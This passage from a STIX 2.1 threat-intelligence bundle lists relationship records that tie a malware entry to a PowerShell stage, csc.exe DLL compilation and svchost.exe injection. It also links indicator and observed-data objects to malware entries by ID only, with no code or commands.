      "target_ref": "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
      "description": "Stage1 PS process"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc3a0f2b-62b1-4bfd-8a9c-1a3c2439683e",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e",
      "description": "csc.exe DLL compilation"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38a4977c-481b-4e31-b51b-fdbfdaf72224",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
      "description": "svchost.exe injection target"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40c3004e-6ed1-42d1-9a74-2925771ce65a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "related-to",
      "source_ref": "observed-data--1e400f18-0cd6-4cf0-a76f-05f936a642c3",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c4525ff5-aa67-4c50-9a1d-b2899c06f0c4",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "related-to",
      "source_ref": "observed-data--d255af9b-affa-4662-9628-876708c3b978",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9be5d4fc-9574-4737-a195-628e736bc870",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "related-to",
      "source_ref": "observed-data--69ee0923-f4ca-4b22-8663-6e53c9b15216",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe8592fd-a702-4ad8-a87a-756b6fceadb2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--4ad3bb0b-98e6-4b68-8940-60b50e15d410",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e722dd5-b88e-432c-b7ab-d7037dc3f55f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--7f56fc75-17b4-463c-8d51-6cea59fb9c67",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41c4adf9-aff1-489e-90a5-2f517c316950",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--17945ceb-5351-4271-b5fb-0dc1262db963",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8dce1b40-6676-48cc-99f8-4959ff9594f1",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--ebb46384-b61d-4ae1-8e2a-aafa6ff724b4",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4643f00-874b-4620-99a6-822f673397fd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--0c18e504-9a50-4da5-8acc-e954c9224b94",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7c7a8a18-1adf-4833-88f1-c569a8c56a17",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--fce050a1-6f2e-4d5a-9168-a77515118121",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9"
    }
  ]
}